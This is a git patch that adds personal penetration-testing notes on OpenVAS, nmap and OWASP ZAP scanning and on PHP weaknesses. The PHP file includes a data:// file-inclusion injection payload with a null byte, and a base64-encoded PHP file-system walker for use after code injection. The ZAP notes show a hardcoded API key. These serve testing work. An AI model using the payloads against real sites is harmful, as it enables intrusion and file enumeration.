From 58cfb1c6884e96e21d4cfe51efaf688ae0bfd7fe Mon Sep 17 00:00:00 2001
From: Andres Hermosilla <ahermosilla@barracuda.com>
Date: Wed, 6 Sep 2017 16:40:11 -0700
Subject: [PATCH] Added security guides on openvas, php, recon & zap

---
 security-openvas.md | 52 +++++++++++++++++++++++++++++++++++++++++++++
 security-php.md     | 41 +++++++++++++++++++++++++++++++++++
 security-recon.md   |  8 +++++++
 security-zap.md     | 11 ++++++++++
 4 files changed, 112 insertions(+)
 create mode 100644 security-openvas.md
 create mode 100644 security-php.md
 create mode 100644 security-recon.md
 create mode 100644 security-zap.md

diff --git a/security-openvas.md b/security-openvas.md
new file mode 100644
index 0000000..a6028c6
--- /dev/null
+++ b/security-openvas.md
@@ -0,0 +1,52 @@
+# Security - OpenVAS
+
+### CLI
+```shell
+# XML handling utils to make life easier
+apt-get install -y  libxml2-utils
+
+# List all targets
+omp -u admin -w admin  --xml='<get_targets/>'
+
+# Create a target
+omp --xml='<create_target><name>Docker - Local</name><hosts>192.168.99.101</hosts></create_target>'
+
+# Confirm target was added
+omp --xml='<get_targets/>'
+
+# Get tasks running
+omp --xml='<get_tasks/>'
+
+# Get config listings of types of scans
+omp --pretty-print --xml='<get_configs/>'
+
+# Create a task
+omp --xml='<create_task><name>ScanWebserver</name><config id="698f691e-7489-11df-9d8c-002264764cea"/><target id="b34578b3-2c0e-485f-9cda-38ecd63ea40c"/></create_task>'
+
+# Start the task
+omp --pretty-print -xml='<start_task task_id="8d5e6664-709f-4275-a661-158feb596386" />'
+
+# Get detailed info on the task
+omp --pretty-print --xml='<get_tasks task_id="8d5e6664-709f-4275-a661-158feb596386" details="1"/>'
+
+# Get report formats
+omp --xml='<get_report_formats/>' | grep -i -A4 '<report_format id=' | egrep -i '(format|name>[a-z]+)'
+
+# Output the report
+omp --pretty-print --xml='<get_reports report_id="adb7dc80-f3e8-4231-9533-56bd45c2c3a5" format_id="c1645568-627a-11e3-a660-406186ea4fc5" max_results="200" />' > report.xml
+xmllint --xpath 'string(/get_reports_response/report)' report.xml  | head -n -16 |  base64 --decode > report.csv
+```
+
+## Links
+- https://github.com/mikesplain/openvas-docker
+- https://www.linuxquestions.org/questions/linux-networking-3/openvas-create-new-tasks-from-omp-4175511045/
+- https://elastic-security.com/2013/07/18/automation-of-vulnerability-assessments-with-openvas/
+- https://pypi.python.org/pypi/openvas.omplib
+- https://github.com/hay/xml2json/new/master
+- https://isc.sans.edu/forums/diary/Automating+Vulnerability+Scans/20685/
+- http://blog.identityautomation.com/managing-infrastructure-with-rapididentity-part-5-performing-openvas-vulnerability-scans
+- https://www.digitalocean.com/community/tutorials/how-to-use-openvas-to-audit-the-security-of-remote-systems-on-ubuntu-12-04
+- https://www.nopsec.com/blog/docker-based-openvas-scanning-cluster-improve-scope-scalability/
+- https://www.linode.com/docs/security/install-openvas-on-ubuntu-16-04
+- https://joedsweb.wordpress.com/2017/02/11/openvas-nagiosplugin/
+- https://www.coveros.com/automating-security-with-devops-it-can-work/
\ No newline at end of file
diff --git a/security-php.md b/security-php.md
new file mode 100644
index 0000000..e26bd57
--- /dev/null
+++ b/security-php.md
@@ -0,0 +1,41 @@
+### Security - PHP
+
+## Timing Attacks
+- https://paragonie.com/blog/2015/11/preventing-timing-attacks-on-string-comparison-with-double-hmac-strategy
+- http://blog.ircmaxell.com/2014/11/its-all-about-time.html
+- https://github.com/pentestmonkey/timing-attack-checker
+
+## Inclusion
+- http://php.net/manual/en/function.include.php
+- Don't forget about the null byte! `%00`
+- https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
+- https://upshell.wordpress.com/2011/06/11/new-vulnerabilities-to-access-files-in-php/
+
+Sometimes PHP is so terribly configured you can inject your code into the inclusion. 
+Here is an example of how you can pass a `sleep(10);` into a possible `include` which 
+would cause the page load to be delayed by ~10s if the page did indeed and a vulernable 
+input & include combo.
+
+`index.php?file=data://text/plain;base64,PD9waHAgc2xlZXAoMzApOw==%00`
+
+#### Recon
+If you can inject your code into PHP includes, below is an example of a file system walker to list all files in the current directory.
+
+```php
+<?php function sc4nn3r($r){
+echo $r.PHP_EOL;
+if(is_file($r)||!is_dir($r))return;
+$ds=scandir($r);
+foreach($ds as$d){
+  if ($d=='.'||$d == '..')continue;
+  $p=$r.'/'.$d;
+  sc4nn3r($p); 
+ }
+}; sc4nn3r('./');
+```
+... base64 Encodes to
+
+`PD9waHAgZnVuY3Rpb24gc2M0bm4zcigkcil7CmVjaG8gJHIuUEhQX0VPTDsKaWYoaXNfZmlsZSgkcil8fCFpc19kaXIoJHIpKXJldHVybjsKJGRzPXNjYW5kaXIoJHIpOwpmb3JlYWNoKCRkcyBhcyRkKXsKICBpZiAoJGQ9PScuJ3x8JGQgPT0gJy4uJyljb250aW51ZTsKICAkcD0kci4nLycuJGQ7CiAgc2M0bm4zcigkcCk7IAogfQp9c2M0bm4zcignLi8nKTs=
+`
+
+
diff --git a/security-recon.md b/security-recon.md
new file mode 100644
index 0000000..5a8950c
--- /dev/null
+++ b/security-recon.md
@@ -0,0 +1,8 @@
+# Security - Recon
+
+## nmap
+```shell
+sudo nmap -v -PN --max-scan-delay=500ms --max-rtt-timeout=650ms --max-retries=2 -sT -sU -p U:69,161,500,53,139,135,137,111,2049,1434,138,T:22,23,21,25,53,79,110,990,997,80,443,8080,8081,8443,8090,111,2049,9090,5061,8200,5800,5900,3389,3306,1477,1433,1234,2222,2121,2323,4443,135,137,139,445,143,5357,1720,3400,10000,9000,9443 --host-timeout=25m -iL IPlist.txt -oA result
+```
+
+- http://resources.infosecinstitute.com/nmap-cheat-sheet/#gref
\ No newline at end of file
diff --git a/security-zap.md b/security-zap.md
new file mode 100644
index 0000000..5707a8f
--- /dev/null
+++ b/security-zap.md
@@ -0,0 +1,11 @@
+# Security - Zap
+
+- https://github.com/zaproxy/zaproxy/wiki/FAQapikey
+- https://zaproxy.blogspot.com/
+- https://github.com/zaproxy/zap-api-python/tree/master/src/examples
+- https://digi.ninja/blog/zap_fuzzing.php
+
+```shell
+zap-cli quick-scan --help
+zap-cli -v --api-key puqllhj6gueggpe5coi6gsm832 quick-scan -sc -s all -r  https://192.168.99.101
+```